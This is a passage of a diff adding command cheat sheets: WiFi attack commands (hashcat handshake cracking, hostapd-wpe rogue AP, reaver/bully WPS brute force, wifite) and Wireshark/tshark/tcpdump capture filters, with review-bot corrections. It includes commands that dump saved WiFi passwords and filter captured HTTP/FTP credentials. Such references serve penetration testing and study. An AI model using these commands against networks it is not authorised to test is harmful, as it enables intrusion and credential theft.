hcxpcapngtool -o hash.22000 pmkid.pcapng
hashcat -m 22000 hash.22000 <wordlist>
# Fake AP with hostapd-wpe
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
# WPS attack with reaver
sudo reaver -i <monitor_interface> -b <bssid> -vv
# WPS attack with bully
sudo bully -b <bssid> -c <channel> <monitor_interface>
# Pixie dust attack (WPS)
sudo reaver -i <monitor_interface> -b <bssid> -vv -K 1
# Wifite - automated attacks
sudo wifite
# Wifite - WPA only
sudo wifite --wpa
# Check if handshake captured
aircrack-ng <capture_file>
# Create wordlist from AP info
crunch 8 8 -t <ssid>%%%% -o custom_wordlist.txt
# Wash - find WPS enabled APs
sudo wash -i <monitor_interface>
# Fern WiFi Cracker (GUI)
sudo fern-wifi-cracker
# Kismet - wireless detection
kismet
# Show saved WiFi passwords (Linux)
sudo cat /etc/NetworkManager/system-connections/* | grep psk=
# Show saved WiFi passwords (Windows)
netsh wlan show profile name="<ssid>" key=clear
$ interface: iw dev | grep Interface | awk '{print $2}'
$ monitor_interface: iw dev | grep Interface | awk '{print $2}' | head -1
$ channel: echo "1\n6\n11"
$ bssid: echo ""
$ client_mac: echo ""
$ output_prefix: echo "capture"
$ capture_file: find . -name "*.cap" -o -name "*.pcap" 2>/dev/null
$ wordlist: echo "/usr/share/wordlists/rockyou.txt"
$ count: echo "5\n10\n0" --- --header "0=continuous"
$ ssid: echo ""
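Review bot: the hashcat entry pairs the wrong converter with mode 22000: `cap2hccapx` produces the legacy hccapx format for the deprecated mode 2500, while mode 22000 takes the `hcxpcapngtool -o hash.22000 <capture_file>` output that the PMKID entry already uses, so use that conversion for handshakes too. Also `crunch 8 8 -t <ssid>%%%%` is only valid when the SSID is exactly four characters, since crunch requires the `-t` pattern length to equal the min/max length; compute the lengths from the SSID or document the assumption. The `hcxdumptool --enable_status=1` / `-o` flags are from the 6.0-era CLI; 6.3+ dropped `--enable_status` and writes with `-w`, so note the version. And the `$ channel` / `$ count` lists use `echo "1\n6\n11"`, which bash's builtin echo prints literally; use `printf '%s\n' 1 6 11`.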

94
wireshark.cheat Normal file

@ -0,0 +1,94 @@
% wireshark, tshark, tcpdump, packets, network-analysis
# Wireshark - open GUI
wireshark
# Wireshark - open specific file
wireshark <pcap_file>
# tshark - capture on interface
sudo tshark -i <interface>
# tshark - capture to file
sudo tshark -i <interface> -w <output_pcap>
# tshark - read pcap file
tshark -r <pcap_file>
# tshark - filter by IP
tshark -r <pcap_file> -Y "ip.addr == <ip>"
# tshark - filter by port
tshark -r <pcap_file> -Y "tcp.port == <port>"
# tshark - HTTP traffic only
tshark -r <pcap_file> -Y "http"
# tshark - DNS traffic only
tshark -r <pcap_file> -Y "dns"
# tshark - follow TCP stream
tshark -r <pcap_file> -z follow,tcp,ascii,<stream_number>
# tshark - extract HTTP objects
tshark -r <pcap_file> --export-objects http,<output_dir>
# tshark - show conversations
tshark -r <pcap_file> -z conv,tcp
# tshark - protocol hierarchy
tshark -r <pcap_file> -z io,phs
# tshark - credentials (basic)
tshark -r <pcap_file> -Y "http.authorization or ftp.request.command == USER or ftp.request.command == PASS"
# tcpdump - capture on interface
sudo tcpdump -i <interface>
# tcpdump - capture to file
sudo tcpdump -i <interface> -w <output_pcap>
# tcpdump - read pcap
tcpdump -r <pcap_file>
# tcpdump - filter by host
sudo tcpdump -i <interface> host <ip>
# tcpdump - filter by port
sudo tcpdump -i <interface> port <port>
# tcpdump - filter by network
sudo tcpdump -i <interface> net <network_cidr>
# tcpdump - verbose with hex
sudo tcpdump -i <interface> -XX -vv
# tcpdump - no DNS resolution
sudo tcpdump -i <interface> -n
# Common Wireshark display filters:
# ip.addr == 192.168.1.1
# tcp.port == 443
# http.request.method == "POST"
# dns.qry.name contains "evil"
# tcp.flags.syn == 1 and tcp.flags.ack == 0
# frame contains "password"
# ssl.handshake.type == 1
# Extract files from pcap with binwalk
binwalk -e <pcap_file>
# NetworkMiner (GUI) - extract artifacts
networkminer <pcap_file>
# Zeek - generate logs from pcap
zeek -r <pcap_file>
$ interface: ip link show | grep -E "^[0-9]" | cut -d: -f2 | tr -d ' ' | grep -v lo
$ pcap_file: find . -name "*.pcap" -o -name "*.pcapng" 2>/dev/null
$ output_pcap: echo "capture.pcap"
$ ip: echo ""
$ port: echo "80\n443\n22\n21\n53"
$ network_cidr: echo "192.168.1.0/24"
$ stream_number: echo "0"
$ output_dir: echo "extracted"
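Review bot: `ssl.handshake.type == 1` in the display-filter list uses the field prefix Wireshark renamed to `tls.` in 3.0; current releases want `tls.handshake.type == 1`. The credentials filter should quote its string literals (`ftp.request.command == "USER"`) for portability across versions, which means wrapping the whole `-Y` expression in single quotes. Also `$ port: echo "80\n443\n22\n21\n53"` relies on echo expanding `\n`, which bash's builtin does not; use `printf '%s\n' 80 443 22 21 53`. And `binwalk -e <pcap_file>` carves at the byte level across packet boundaries, so it tends to miss or mangle objects; the `--export-objects` entry and NetworkMiner are the reliable routes.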